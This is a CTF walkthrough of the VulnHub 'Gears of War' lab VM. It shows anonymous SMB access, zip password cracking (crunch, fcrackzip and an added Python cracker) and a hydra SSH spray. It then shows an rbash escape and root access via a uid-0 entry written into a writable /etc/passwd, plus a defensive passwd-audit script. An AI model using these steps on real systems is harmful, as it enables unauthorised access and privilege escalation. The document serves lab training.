Target VM download:
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
Kali (VMware) with two NICs:
NIC 1: VMnet0 (bridged mode), bridged to the VirtualBox Host-Only Ethernet Adapter, so Kali can reach the VirtualBox target
NIC 2: NAT mode, for Internet access
Information gathering
Kali eth0 IP: 192.168.56.129
Find the target's IP address
arp-scan -l
Identify the target by its MAC address (the VirtualBox OUI 08:00:27, which nmap also reports below)
Target IP: 192.168.56.101
Scan the target's open ports and services
nmap -sS -sV -A -T4 -p- 192.168.56.101
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p- 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 06:21 EST
Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:03:8d:1f:f8:c9:d4:b4:43:b3:c3:73:12:ba:95:e1 (RSA)
| 256 1b:a0:5f:3e:a2:6b:22:5a:81:c3:18:7e:5b:fc:d2:bd (ECDSA)
|_ 256 18:1f:0c:d6:e7:2a:f5:5c:45:cb:8d:79:70:31:4b:7a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
MAC Address: 08:00:27:C6:C7:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: gears_of_war
| NetBIOS computer name: GEARS_OF_WAR\x00
| Domain name: \x00
| FQDN: gears_of_war
|_ System time: 2024-12-09T11:22:09+00:00
| smb2-time:
| date: 2024-12-09T11:22:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 19.07 seconds
Open ports: 22, 80, 139, 445
Enumerate directories and files on port 80
Method 1: dirb http://192.168.56.101
+ http://192.168.56.101/index.html (CODE:200|SIZE:200)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:64)
+ http://192.168.56.101/server-status (CODE:403|SIZE:279)
Only robots.txt and index.html (server-status is 403).
Method 2: dirsearch -u http://192.168.56.101
Same result as method 1, plus a few uninteresting hidden files.
Method 3: gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt -x .php,.txt,.html,.zip
SecLists has to be fetched first (danielmiessler/SecLists on GitHub).
/dom.html /index.html /marcus.html /robots.txt
Four hits. The extra pages come from the larger wordlist and the -x extension list rather than from the tool itself, but gobuster with a SecLists wordlist is a good default for web content discovery.
Visiting the discovered URLs in a browser
robots.txt contains the interesting part:
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
Each of these five pages only shows an image of what look like characters from a game or film (the Gears of War theme). Either the images hide something, or the page source is worth checking.
index.html contains:
an image of what looks like a game scene
the Apache2 Ubuntu Default Page
Nothing useful there.
Back to the port scan:
nmap -sS -sV -A -T4 -p- 192.168.56.101
showed 22 (ssh), 80 (http) and 139/445 (Samba).
What Samba provides:
File sharing: Samba lets Linux/Unix and Windows systems share files, e.g. a directory on a Linux host exported so that Windows machines see it like a local Windows share.
Printer sharing: printers attached to a Linux/Unix host can be shared to Windows clients.
Windows network integration: Samba supports Windows workgroup and domain modes, so a Linux/Unix host can join a Windows network for authentication and access control, for example as a member of a Windows domain.
Windows networking services: Samba also handles NetBIOS and DNS, so Windows-style computer-name resolution and resource sharing work from Linux/Unix.
Since the web side exposed no credentials, the Samba service is the most likely way in.
Exploitation
SMB enumeration
Without a username or password the shares can still be listed over a null session: smbclient -L //192.168.56.101 -U "" does that if you press Enter at the password prompt (smbclient -N -L //192.168.56.101 skips the prompt). smbmap does the same and also reports what the anonymous user may do on each share:
smbmap -H 192.168.56.101
[+] IP: 192.168.56.101:445 Name: 192.168.56.101 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
LOCUS_LAN$ READ ONLY LOCUST FATHER
IPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu))
The LOCUS_LAN$ share ("LOCUST FATHER") is readable anonymously; IPC$ is not accessible.
Connect to the share
smbclient //192.168.56.101/LOCUS_LAN$
┌──(root㉿kali)-[~]
└─# smbclient //192.168.56.101/LOCUS_LAN$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
help
ls
get msg_horda.zip
get SOS.txt
quit
smb: \> get msg_horda.zip
getting file \msg_horda.zip of size 332 as msg_horda.zip (108.1 KiloBytes/sec) (average 108.1 KiloBytes/sec)
smb: \> get SOS.txt
getting file \SOS.txt of size 198 as SOS.txt (64.5 KiloBytes/sec) (average 86.3 KiloBytes/sec)
smb: \>
Two files downloaded: an archive and a text file.
Generating a password list
The hint in SOS.txt:
cat SOS.txt
This is a message for the Delta Team.
I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!
[@%%,]
-Hoffman.
Try to extract the archive
unzip msg_horda.zip
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
It asks for a password we do not have.
So the zip password has to be brute-forced.
Generate the wordlist with crunch, using the [@%%,] string from SOS.txt as a crunch -t mask: @ stands for a lowercase letter, % for a digit and , for an uppercase letter, so the password is four characters of the form lower-digit-digit-upper, 26 x 10 x 10 x 26 = 67600 candidates, which is exactly the line count crunch reports below.
crunch 4 4 -t @%%, -o list.txt
┌──(root㉿kali)-[~]
└─# crunch 4 4 -t @%%, -o list.txt
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600
crunch: 100% completed generating output
fcrackzip -D -u -p list.txt msg_horda.zip
(-D dictionary mode, -p the wordlist file; -u makes fcrackzip confirm every hit with unzip, which weeds out the false positives that ZipCrypto's one-byte password check lets through)
┌──(root㉿kali)-[~]
└─# fcrackzip -D -u -p list.txt msg_horda.zip
PASSWORD FOUND!!!!: pw == r44M
Zip password: r44M
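The following Python script is an added example and is not part of the original walkthrough, nor code from crunch or fcrackzip. It does the same two steps in one place: it expands a crunch-style -t mask (@ lowercase, , uppercase, % digit, ^ symbol) into candidates and tries each one against a ZipCrypto-protected archive with the standard zipfile module. The mask and archive path are command-line arguments; using string.punctuation for the ^ placeholder is an assumption rather than crunch's exact symbol list.

```python
import itertools
import string
import sys
import zipfile
import zlib

# crunch -t placeholders: @ lowercase, , uppercase, % digit, ^ symbol.
# string.punctuation for ^ approximates crunch's own symbol list (assumption).
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}


def pattern_charsets(mask):
    """One character set per position; a non-placeholder character stays fixed."""
    return [PLACEHOLDERS.get(ch, ch) for ch in mask]


def pattern_size(mask):
    """Number of candidates the mask expands to (26*10*10*26 = 67600 for @%%,)."""
    size = 1
    for charset in pattern_charsets(mask):
        size *= len(charset)
    return size


def expand_pattern(mask):
    """Yield every candidate, rightmost position varying fastest, without
    materialising the whole list the way crunch -o does."""
    for combo in itertools.product(*pattern_charsets(mask)):
        yield "".join(combo)


def crack_zip(zip_path, candidates):
    """Return the first candidate that decrypts the archive's first encrypted
    member, or None. zipfile only supports legacy ZipCrypto (the scheme
    fcrackzip attacks); AES-encrypted zips need john/zip2john or hashcat."""
    with zipfile.ZipFile(zip_path) as zf:
        target = next((i for i in zf.infolist() if i.flag_bits & 0x1), None)
        if target is None:
            raise ValueError(f"{zip_path}: no encrypted member")
        for pw in candidates:
            try:
                with zf.open(target, pwd=pw.encode()) as member:
                    member.read()  # full decrypt plus CRC check, like fcrackzip -u
                return pw
            except RuntimeError:
                continue  # ZipCrypto's 1-byte header check rejected the password
            except (zipfile.BadZipFile, zlib.error):
                continue  # check byte matched by chance (1 in 256), data was garbage
    return None


if __name__ == "__main__":
    mask, path = sys.argv[1], sys.argv[2]  # e.g. '@%%,' msg_horda.zip
    print(f"{pattern_size(mask)} candidates for mask {mask}")
    print("password:", crack_zip(path, expand_pattern(mask)))
```

Run it as python3 crack_mask.py '@%%,' msg_horda.zip (script name assumed). Because the traditional PKWARE scheme only verifies one byte of the 12-byte encryption header, roughly one in 256 wrong passwords passes that check; the script therefore fully decrypts the member and treats a CRC or zlib failure as a false positive, which is the job fcrackzip's -u flag delegates to unzip.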
Extract the archive and read the contents
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
inflating: key.txt
This yields key.txt:
┌──(root㉿kali)-[~]
└─# cat key.txt
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.
We get 3_d4y, bracketed the same way [@%%,] was.
It looks like a password; the guess is that it is an SSH password.
No username has turned up so far, so the username has to be brute-forced. The five character pages from robots.txt (marcus, dom, cole, baird, acarmine) are the natural candidate list; the walkthrough instead sprays the one password across every line of rockyou.txt used as a username, which also works but is slow (hydra estimates 679 hours for the full list below; marcus happens to come up early).
SSH
Brute-forcing the username
cd /usr/share/wordlists
ls
gunzip rockyou.txt.gz
┌──(root㉿kali)-[~]
└─# cd /usr/share/wordlists
┌──(root㉿kali)-[/usr/share/wordlists]
└─# ls
amass dnsmap.txt john.lst nmap.lst SecLists-master.zip wifite.txt
dirb fasttrack.txt legion rockyou.txt.gz sqlmap.txt
dirbuster fern-wifi metasploit SecLists-master wfuzz
┌──(root㉿kali)-[/usr/share/wordlists]
└─# gunzip rockyou.txt.gz
cd
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
┌──(root㉿kali)-[~]
└─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 07:55:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344051 to do in 679:11h, 12 active
[22][ssh] host: 192.168.56.101 login: marcus password: 3_d4y
Credentials: marcus / 3_d4y (hydra's warning about parallel tasks applies to sshd's connection limit; -t 4 is the safer setting)
Privilege escalation
Log in over SSH: ssh marcus@192.168.56.101, password 3_d4y
marcus@gears_of_war:~$
ls -al
cd jail
marcus@gears_of_war:~$ ls -al
total 40
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 .
drwxr-xr-x 4 root root 4096 Oct 17 2019 ..
-rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history
-rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local
-rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
Only one directory, jail, and cd is refused: marcus's login shell is rbash (restricted bash, which forbids cd, changing PATH and running commands whose name contains a /), as the /bin/rbash entry in /etc/passwd later confirms.
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$ ls
Bypass the restricted shell
ssh marcus@192.168.56.101 -t "bash -noprofile"
rbash only restricts the shell it is running in; it still executes any command found on PATH whose name has no slash, and bash is one of them. Asking sshd to run bash directly therefore yields an unrestricted shell. -noprofile (bash accepts it as equivalent to the documented --noprofile) tells bash not to read /etc/profile and ~/.profile, and -t allocates a tty so the new shell is interactive. Note that an interactive non-login shell still reads ~/.bashrc, so if the restrictions had been set there, --norc would be needed as well.
(password: 3_d4y)
marcus@gears_of_war:~$ cd jail/
marcus@gears_of_war:~/jail$ ls
marcus@gears_of_war:~/jail$ ls -al
total 8
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 .
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 ..
The directory is empty; the jail is a decoy.
Look for setuid binaries
find / -type f -perm -u=s 2>/dev/null
/usr/bin/passwd
passwd being setuid root is normal on every Linux system and is not a vulnerability by itself. What the next step actually relies on is that /etc/passwd is writable by marcus: the cp into /etc/passwd below succeeds without any privilege, which a quick ls -l /etc/passwd would have shown up front.
Create a root account via /etc/passwd
openssl passwd -1 -salt abc 123
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123
$1$abc$98/EDagBiz63dxD3fhRFk1
marcus@gears_of_war:~/jail$
Append the new entry to a copy of /etc/passwd: a hash in the second field is used directly instead of the "x" shadow lookup, and uid 0 makes the account root.
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2 and add the line: abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2
marcus@gears_of_war:~/jail$ vim /tmp/passwd2
marcus@gears_of_war:~/jail$ cat /tmp/passwd2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash
marcus@gears_of_war:~/jail$
cp /tmp/passwd2 /etc/passwd
This overwrite only works because /etc/passwd is writable by marcus.
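As an added detection-side example (not from the original walkthrough), the Python script below audits passwd-format text for exactly the artefacts this step leaves behind: an entry with a hash instead of x, a second uid-0 account, a malformed line, and a file mode that lets an unprivileged user write /etc/passwd in the first place. The sample lines are constructed from the /tmp/passwd2 listing above, including the abc entry as the author actually wrote it; the function names are the example's own.

```python
import os
import stat
from collections import Counter

# /etc/passwd layout: name:passwd:uid:gid:gecos:home:shell
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def mode_allows_unprivileged_write(st_mode):
    """True if the file is writable by group or others. That is the precondition
    for 'cp /tmp/passwd2 /etc/passwd' succeeding as a normal user."""
    return bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd(text):
    """Return [(username, finding), ...] for suspicious entries in passwd-format text."""
    findings = []
    names = Counter()
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        parts = raw.split(":")
        name = parts[0]
        names[name] += 1
        if len(parts) != len(FIELDS):
            # Six fields means the shell column is empty; su/login then fall back to /bin/sh
            findings.append((name, f"malformed entry: {len(parts)} fields, expected 7"))
        if len(parts) > 1 and parts[1] != "x":
            if parts[1] == "":
                findings.append((name, "empty password field"))
            else:
                findings.append((name, "password hash kept in /etc/passwd rather than /etc/shadow"))
        if len(parts) > 2 and parts[2] == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
    for name, count in names.items():
        if count > 1:
            findings.append((name, f"username appears {count} times"))
    return findings


def audit_file(path="/etc/passwd"):
    """Run both checks against a real file on the host."""
    findings = []
    if mode_allows_unprivileged_write(os.stat(path).st_mode):
        findings.append(("(file)", f"{path} is writable by group or others"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_passwd(fh.read()))
    return findings


# Constructed sample: three lines taken from the walkthrough's /tmp/passwd2 listing,
# including the six-field abc entry exactly as it was written there.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash
"""

if __name__ == "__main__":
    for user, why in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {why}")
```

On the sample the abc line is reported three times (malformed, hash in passwd, extra uid 0) while root and marcus are clean. The same checks belong in a file-integrity baseline: a change to /etc/passwd that adds a second uid-0 user is a high-confidence signal regardless of which setuid binary the attacker went looking for first.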
Note that the entry actually written above has six fields instead of seven: the home directory is missing, /bin/bash landed in the home field and the shell field is empty, so su falls back to /bin/sh (hence the plain # prompt and the "sh:" error below). The account is still uid 0, which is all that matters here.
Switch user
su abc
123
whoami
pwd
id
cd /root
ls -al
marcus@gears_of_war:~/jail$ su abc
Password:
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/home/marcus/jail
# cd /root
# ks
sh: 5: ks: not found
# ls
# ls -al
total 52
drwx------ 6 root root 4096 Oct 17 2019 .
drwxr-xr-x 24 root root 4096 Oct 16 2019 ..
-rw------- 1 root root 216 Oct 17 2019 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Oct 17 2019 .cache
-rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt
drwx------ 3 root root 4096 Oct 17 2019 .gnupg
drwxr-xr-x 3 root root 4096 Oct 16 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Oct 16 2019 .ssh
Read the flag (the ASCII art that follows is the file's content):
# cat .flag.txt
.,*,,
.*(((#((((*,.
,*/,,,..*/(((/*/#(.
.*//*((####(/,,*,/(#(*
..,*//((*, ....**/**(##########%#(*,*(#/.
.*/((#######((*. ..,*..*,,**///*,,,/(################(//*,.
.,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.
.,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.
,*(##(#((((/#######%#(###(##################################/((*
.*((#/*/(/(#############(#######################(#((#(######*((*
.*((((#####################################(########((######**/*.
,/##((###########################################(##########*,(///.
*(((###%#####################################################(,****,
.,/(##(#######%%#####%############(#(############################(***,.
.**(##%##%###(#####((###############%######//,,*/((###################(,...
./(##((##%#(##(/(((((##########################/*. *(############%####(,. .
**(####((###((///####%######################%####(*, ,((###############*
.,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,.
..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*.
.,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/
,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((.
.,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####*
.**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####(
.,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##,
,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(*
,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(*
.*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/
,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(.
./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(*
.*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/
,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#(
/(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/
/#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/
(###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/
./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/,
.*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//.
.*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/*
,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/,
,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/**,.
.,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/***,
..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,.
,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,.
*(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,.
..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,..
...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,.
..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,.
.,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(*
.,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**.
.,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/.
..,,********,,((####################(#(///******/*///(((###########%#####%###(/.
. ,*******/(###################((#################################(###/,
.,,,/**/##################(#######(#########################((####,
.*/*/#######################################################(#(.
.//############((((########(#######################((####((/*.
. ,(##########(((((((###########################((###(((((((*,
. .((############((((###(*,,*//*///*//(##%############((//**/*,
.*(######(#(#######(**, .*(#######((((/(//**,,
. ,*/#####((((((##/, .*. ./###((((,.
.,.,,//#########*.. . ,, /((/(/*,
. . . ,../(#####(*/ . . ..
* .. .,/(#*. . .
.,../#, . . .
. . .#/ . .
.. .#/ .
#/
. .(/
. /#
. ,(. . .
.. ,(( .
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
#